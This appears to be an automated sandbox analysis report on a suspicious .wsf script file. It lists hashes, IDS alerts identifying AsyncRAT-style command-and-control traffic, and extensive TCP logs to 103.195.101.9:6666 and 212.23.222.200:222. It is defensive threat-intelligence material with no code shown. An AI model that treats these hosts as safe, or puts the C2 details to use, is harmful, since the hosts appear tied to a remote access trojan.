                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          File type:Unicode text, UTF-8 text, with very long lines (2416), with CRLF line terminators
                                          Entropy (8bit):4.84849114176381
                                          TrID:
                                            File name:Summaryform_FXnbLLyKOJ.wsf
                                            File size:89'706 bytes
                                            MD5:75dc4de3834d7a713ca0e33c3d1c9b1b
                                            SHA1:7b197014208a3aadcadd571f4ced60eb4acbefdc
                                            SHA256:f8a6ff7847a05d31933deb7386190372bbe6a8af3bfde04b757731341d9ac4a3
                                            SHA512:e4ec1f0087f98b943dc342b584f2b57c928221668cf836c1d3cab062cb9d8f2cc289657d0b5f7f16655821c564de8637a0a409ea535c41b7da1e26d3de21070d
                                            SSDEEP:96:JABBBBBBBABBBG9999999xABBBBBBBABBBG9999999xABBBBBBBABBBG9999999C:fqaIGCBu7
                                            TLSH:3293B23CAE273ACD6730C17A10B161D6979378492364605BD63E7E65CF8B4B076FB222
                                            File Content Preview:.. ...... .. ........ ........ .... ...... ...... ................ .. ........ .......... .. .......... .. ........ .......... .. ...... ...... ...... ...... .. ........ ........ .... ...... ...... ................ .. ........ .......... .. ....
                                            Icon Hash:68d69b8f86ab9a86
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
03/14/24-16:35:17.108992 | TCP | 2035595 | ET TROJAN Generic AsyncRAT Style SSL Cert | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
03/14/24-16:35:17.108992 | TCP | 2030673 | ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 14, 2024 16:34:46.907365084 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:47.098476887 CET | 222 | 49699 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:47.098620892 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:47.099097013 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:47.290836096 CET | 222 | 49699 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:47.290913105 CET | 222 | 49699 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:47.291023970 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:47.291062117 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:52.292414904 CET | 222 | 49699 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:52.292561054 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:54.487396002 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:54.672761917 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:54.672868967 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:54.673120022 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:54.858664989 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:54.893635035 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.079904079 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.079967976 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080007076 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080044031 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080049992 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.080080986 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080101967 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.080120087 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080167055 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.080267906 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080303907 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080362082 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.080375910 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080424070 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.080482006 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.265543938 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266215086 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266235113 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266247988 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266262054 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266263008 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.266274929 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266288042 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.266298056 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266329050 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.266468048 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.266511917 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.271177053 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.272048950 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.272067070 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.272082090 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.272093058 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.272123098 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.272649050 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273128033 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273143053 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273170948 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.273313999 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273328066 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273365021 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.273655891 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273670912 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273683071 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.273713112 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.273749113 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.452423096 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452503920 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452547073 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452585936 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452605963 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.452631950 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452656984 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.452672958 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452709913 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452738047 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.452745914 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452785969 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452795029 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.452824116 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452862024 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452893019 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.452899933 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.452944040 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.453097105 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.453135967 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.453174114 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.453211069 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.453217030 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.453262091 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.456700087 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.456756115 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.456811905 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.456831932 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.456902027 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.456938982 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.456954956 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.456990957 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.457061052 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.457098961 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.457108974 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.457156897 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.457794905 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.457830906 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.457922935 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.457954884 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.457961082 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458013058 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.458055973 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458127022 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458163023 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458256006 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458302975 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.458302975 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.458306074 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458376884 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458424091 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.458448887 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458518028 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458559036 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458591938 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.458635092 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458672047 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458681107 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.458715916 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.458846092 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.638052940 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.638274908 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.638314009 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.638335943 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.638354063 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.638392925 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.638406038 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:34:55.638504028 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:34:55.638714075 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:35:00.101567984 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:35:00.101773024 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:35:00.104646921 CET | 49703 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:35:00.289685011 CET | 222 | 49703 | 212.23.222.200 | 192.168.2.6
Mar 14, 2024 16:35:06.082894087 CET | 49699 | 222 | 192.168.2.6 | 212.23.222.200
Mar 14, 2024 16:35:16.831888914 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:16.951502085 CET | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:16.951627970 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:16.985315084 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:17.108992100 CET | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:17.109117031 CET | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:17.109170914 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:17.119286060 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:17.240009069 CET | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:17.342572927 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.515186071 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.519052982 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.634943008 CET | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:22.634965897 CET | 6666 | 49711 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:22.635066032 CET | 49711 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.638997078 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:22.639087915 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.639668941 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.759717941 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:22.761483908 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:22.923084021 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:22.923151970 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:23.094429970 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.049256086 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.185060978 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.305143118 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.321768045 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.485902071 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.485971928 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.657321930 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778565884 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778616905 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778666973 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778671980 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.778762102 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778775930 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778789043 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778800964 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.778803110 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778832912 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.778856039 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778870106 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778929949 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.778968096 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.778986931 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.779010057 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.898608923 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898632050 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898643970 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898657084 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898669958 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898680925 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.898684978 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898741007 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.898745060 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898768902 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898782969 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898782969 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.898829937 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.898840904 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898873091 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898915052 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.898932934 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.898957014 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.899014950 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.899065018 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.899133921 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.899169922 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.899178982 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:28.899207115 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.899244070 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:28.899251938 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.018615961 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.018668890 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.018707037 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.018709898 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.018753052 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.018804073 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.018877983 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.018927097 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.018971920 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019042969 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019088984 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.019129038 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019198895 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019243956 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.019325972 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019452095 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019505978 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019506931 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.019599915 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019644976 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.019686937 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019797087 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.019843102 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.019891024 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020091057 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020137072 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.020183086 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020271063 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020309925 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.020448923 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020488024 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020525932 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020531893 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.020564079 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020600080 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020617008 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.020670891 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020708084 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020718098 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.020776987 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020823002 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.020864964 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.020972013 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.021011114 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.021056890 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.021090031 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.021142960 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.021181107 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.021250010 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
Mar 14, 2024 16:35:29.021300077 CET | 49712 | 6666 | 192.168.2.6 | 103.195.101.9
Mar 14, 2024 16:35:29.021379948 CET | 6666 | 49712 | 103.195.101.9 | 192.168.2.6
                                            Mar 14, 2024 16:35:29.021418095 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.021466017 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.021512985 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138756037 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138822079 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138850927 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.138860941 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138900995 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138922930 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.138938904 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138976097 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.138982058 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139014006 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139051914 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139060974 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:29.139100075 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:29.139137983 CET666649712103.195.101.9192.168.2.6
